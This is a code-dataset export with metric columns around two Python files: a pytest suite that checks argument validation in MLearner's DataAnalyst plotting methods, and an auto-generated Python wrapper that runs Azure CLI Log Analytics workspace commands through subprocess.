| 0.020647
| 0.017843
| 0.898037
| 0.879684
| 0.861331
| 0.843997
| 0.834565
| 0.834565
| 0
| 0.059822
| 0.357236
| 7,698
| 163
| 310
| 47.226994
| 0.733023
| 0.025461
| 0
| 0.816327
| 0
| 0
| 0.00747
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027211
| false
| 0
| 0.020408
| 0.006803
| 0.07483
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7869ec679371f149f9583c03b5286932a3fc79ff
| 13,905
|
py
|
Python
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 6
|
2020-04-16T22:36:14.000Z
|
2020-04-25T14:34:47.000Z
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 9
|
2020-04-16T18:25:37.000Z
|
2020-05-03T17:24:36.000Z
|
mlearner/preprocessing/test/test_data_analyst.py
|
jaisenbe58r/MLearner
|
e768a4cad150b35fb5bf543ab28aa23764af51d9
|
[
"MIT"
] | 1
|
2020-04-18T17:29:42.000Z
|
2020-04-18T17:29:42.000Z
|
"""Jaime Sendra Berenguer-2020.
MLearner Machine Learning Library Extensions
Author:Jaime Sendra Berenguer<www.linkedin.com/in/jaisenbe>
License: MIT
"""
import pandas as pd
import numpy as np
import pytest
from mlearner.preprocessing import DataAnalyst
import matplotlib
# Select a backend before any plotting so the tests never need a display
# ('Template' appears to be matplotlib's do-nothing skeleton backend — TODO confirm).
matplotlib.use('Template')
# Shared fixture frame: two numeric columns ("a", "b") and one object/
# categorical column ("c") taking the values "OK"/"NOK".
data = pd.DataFrame({"a": [0., 1., 1., 0., 1., 1.], "b": [10, 11, 12, 13, 11, 100], "c": ["OK", "OK", "NOK", "OK", "OK", "NOK"]})
# Default numeric feature selection reused by the tests below.
col = ["a", "b"]
"""
DATA ANALYST -- BOXPLOT
"""
# --- DataAnalyst constructor + boxplot argument validation -------------------

def test_init_type_data():
    # Constructor must reject anything that is not a DataFrame.
    as_array = np.array(data)
    with pytest.raises(TypeError):
        DataAnalyst(as_array)


def test_boxplot_features_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.boxplot(features=np.array(col))


def test_boxplot_features_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=[])


def test_boxplot_features_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=["d"])


def test_boxplot_features_error_object():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=["c"], target=["a"])


def test_boxplot_feature_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.boxplot(features=["a"], target=np.array(col))


def test_boxplot_feature_error_null():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=col, target=["d"])


def test_boxplot_target_error_null2():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=col, target=[])


def test_boxplot_target_error_only():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=col, target=["a", "b"])


def test_boxplot_target_error_None():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=col)


def test_boxplot_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.boxplot(features=col, target=["c"], save_image=True, path="/invalid")


def test_boxplot_display_image():
    # Smoke test: a fully valid call must not raise.
    DataAnalyst(data).boxplot(features=["a", "b"], target=["c"], display=True)


def test_boxplot_features_none():
    DataAnalyst(data).boxplot(target=["c"], display=True)
"""
DATA ANALYST -- dISPERSION
"""
# --- dispersion_categoria argument validation --------------------------------

def test_dispersion_categoria_features_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.dispersion_categoria(features=np.array(col))


def test_dispersion_categoria_features_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=[])


def test_dispersion_categoria_features_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=["d"])


def test_dispersion_categoria_features_error_object():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=["c"], target=["a"])


def test_dispersion_categoria_target_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.dispersion_categoria(features=["a"], target=np.array(col))


def test_dispersion_categoria_target_error_null():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=col, target=["d"])


def test_dispersion_categoria_target_error_null2():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=col, target=[])


def test_dispersion_categoria_target_error_only():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=col, target=["a", "b"])


def test_dispersion_categoria_target_error_None():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=col)


def test_dispersion_categoria_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.dispersion_categoria(features=col, target=["c"], save_image=True, path="/incorrect")


def test_dispersion_categoria_save_image():
    # Smoke tests: valid calls must not raise.
    DataAnalyst(data).dispersion_categoria(features=["a", "b"], target=["c"], display=True)


def test_dispersion_categoria_save_image1():
    DataAnalyst(data).dispersion_categoria(target=["c"], display=True)
"""
DATA ANALYST -- PAIRPLOT
"""
# --- sns_jointplot argument validation ---------------------------------------

def test_sns_jointplot_feature1_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_jointplot(feature1=np.array(["a"]), feature2=["b"], target=["c"], categoria1="OK")


def test_sns_jointplot_feature1_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=[], feature2=["b"], target=["c"], categoria1="OK")


def test_sns_jointplot_feature1_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["d"], feature2=["b"], target=["c"], categoria1="OK")


def test_sns_jointplot_feature1_error_object():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["c"], feature2=["b"], target=["c"], categoria1="OK")


def test_sns_jointplot_feature2_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_jointplot(feature1=["a"], feature2=np.array(["b"]), target=["c"], categoria1="OK")


def test_sns_jointplot_feature2_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=[], target=["c"], categoria1="OK")


def test_sns_jointplot_feature2_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["d"], target=["c"], categoria1="OK")


def test_sns_jointplot_feature2_error_object():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["c"], target=["c"], categoria1="OK")


def test_sns_jointplot_target_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=np.array(["c"]), categoria1="OK")


def test_sns_jointplot_target_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=[], categoria1="OK")


def test_sns_jointplot_target_error_not_include():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["d"], categoria1="OK")


def test_sns_jointplot_target_error_none():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], categoria1="OK")


def test_sns_jointplot_categoria1_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=np.array(["OK"]))


def test_sns_jointplot_categoria1_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=[])


def test_sns_jointplot_categoria1_error_max():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK", "OK"])


def test_sns_jointplot_categoria1_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OKNOK"])


def test_sns_jointplot_categoria1_error_None():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=None)


def test_sns_jointplot_categoria2_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=np.array(["OK"]))


def test_sns_jointplot_categoria2_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=[])


def test_sns_jointplot_categoria2_error_max():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["OK", "OK"])


def test_sns_jointplot_categoria2_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["OKNOK"])


def test_sns_jointplot_categoria2_noerror_None():
    # categoria2=None is explicitly allowed (no exception expected).
    DataAnalyst(data).sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=None)


def test_sns_jointplot_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["NOK"], save_image=True, path="/invalid")


def test_sns_jointplot_display():
    DataAnalyst(data).sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"], categoria2=["NOK"], display=True)


def test_sns_jointplot_test1():
    DataAnalyst(data).sns_jointplot(feature1=["a"], feature2=["b"], target=["c"], categoria1=["OK"])
"""
DATA ANALYST -- PAIRPLOT
"""
# --- sns_pairplot argument validation ----------------------------------------

def test_sns_pairplot_features_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_pairplot(features=np.array(col))


def test_sns_pairplot_features_error_empty():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=[])


def test_sns_pairplot_features_error_not_included():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=["d"])


def test_sns_pairplot_features_error_object():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=["c"], target=["a"])


def test_sns_pairplot_target_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.sns_pairplot(features=["a"], target=np.array(col))


def test_sns_pairplot_target_error_null():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=col, target=["d"])


def test_sns_pairplot_target_error_null2():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=col, target=[])


def test_sns_pairplot_target_error_only():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=col, target=["a", "b"])


def test_sns_pairplot_target_error_None():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=col)


def test_sns_pairplot_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.sns_pairplot(features=col, target=["c"], save_image=True, path="/incorrect")


def test_sns_pairplot_save_image():
    # Smoke tests: valid calls must not raise.
    DataAnalyst(data).sns_pairplot(features=["a", "b"], target=["c"], display=True)


def test_sns_pairplot_save_image1():
    DataAnalyst(data).sns_pairplot(target=["c"], display=True)
"""
DATA ANALYST -- Distribution targets
"""
# --- distribution_targets argument validation --------------------------------

def test_distribution_targets_target_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.distribution_targets(target=np.array(col))


def test_distribution_targets_target_error_null():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.distribution_targets(target=["d"])


def test_distribution_targets_target_error_null2():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.distribution_targets(target=[])


def test_distribution_targets_target_error_only():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.distribution_targets(target=["a", "b"])


def test_distribution_targets_target_error_None():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.distribution_targets()


def test_distribution_targets_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.distribution_targets(target=["c"], save_image=True, path="/incorrect")


def test_distribution_targets_save_image():
    # Smoke tests: both display modes must not raise.
    DataAnalyst(data).distribution_targets(target=["c"], display=True)


def test_distribution_targets_save_image1():
    DataAnalyst(data).distribution_targets(target=["c"], display=False)
"""
DATA ANALYST -- corr_matrix
"""
# --- corr_matrix argument validation -----------------------------------------

def test_corr_matrix_feature_error_type():
    analyst = DataAnalyst(data)
    with pytest.raises(TypeError):
        analyst.corr_matrix(features=np.array(["a", "b"]))


def test_corr_matrix_feature_error_null():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.corr_matrix(features=["d"])


def test_corr_matrix_feature_error_null2():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.corr_matrix(features=[])


def test_corr_matrix_feature_error_only():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.corr_matrix(features=["c"])


def test_corr_matrix_feature_error_None():
    # No features argument is allowed (defaults internally, no exception).
    DataAnalyst(data).corr_matrix()


def test_corr_matrix_incorrect_path():
    analyst = DataAnalyst(data)
    with pytest.raises(NameError):
        analyst.corr_matrix(features=["a", "b"], save_image=True, path="/incorrect")


def test_corr_matrix_save_image():
    # Smoke tests: both display modes must not raise.
    DataAnalyst(data).corr_matrix(features=["a", "b"], display=True)


def test_corr_matrix_save_image1():
    DataAnalyst(data).corr_matrix(features=["a", "b"], display=False)
| 27.81
| 143
| 0.697735
| 1,749
| 13,905
| 5.297885
| 0.05546
| 0.058925
| 0.141269
| 0.138139
| 0.939456
| 0.89251
| 0.761062
| 0.721239
| 0.703
| 0.669221
| 0
| 0.011294
| 0.15311
| 13,905
| 499
| 144
| 27.865731
| 0.77556
| 0.0105
| 0
| 0.462295
| 0
| 0
| 0.020232
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.255738
| false
| 0
| 0.016393
| 0
| 0.272131
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78badbd66f1ab2623736fed8c7571a9527d95f98
| 5,912
|
py
|
Python
|
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/monitor/log_analytics/workspace/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def create(resource_group, workspace_name, location=None, tags=None, sku=None, capacity_reservation_level=None, retention_time=None, quota=None, query_access=None, ingestion_access=None, no_wait=None):
params = get_params(locals())
command = "az monitor log-analytics workspace create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, workspace_name, tags=None, capacity_reservation_level=None, retention_time=None, quota=None, query_access=None, ingestion_access=None, set=None, add=None, remove=None, force_string=None):
params = get_params(locals())
command = "az monitor log-analytics workspace update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, workspace_name, force=None, yes=None):
params = get_params(locals())
command = "az monitor log-analytics workspace delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group=None):
params = get_params(locals())
command = "az monitor log-analytics workspace list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_deleted_workspaces(resource_group=None):
params = get_params(locals())
command = "az monitor log-analytics workspace list-deleted-workspaces " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def recover(workspace_name, resource_group=None, no_wait=None):
params = get_params(locals())
command = "az monitor log-analytics workspace recover " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def get_schema(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace get-schema " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_usages(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace list-usages " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list_management_groups(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace list-management-groups " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def get_shared_keys(resource_group, workspace_name):
params = get_params(locals())
command = "az monitor log-analytics workspace get-shared-keys " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 37.417722
| 214
| 0.679804
| 722
| 5,912
| 5.48892
| 0.099723
| 0.077719
| 0.055514
| 0.058289
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0.8973
| 0
| 0.004698
| 0.207882
| 5,912
| 157
| 215
| 37.656051
| 0.841555
| 0
| 0
| 0.834483
| 0
| 0
| 0.104871
| 0.007612
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075862
| false
| 0
| 0.013793
| 0
| 0.165517
| 0.227586
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.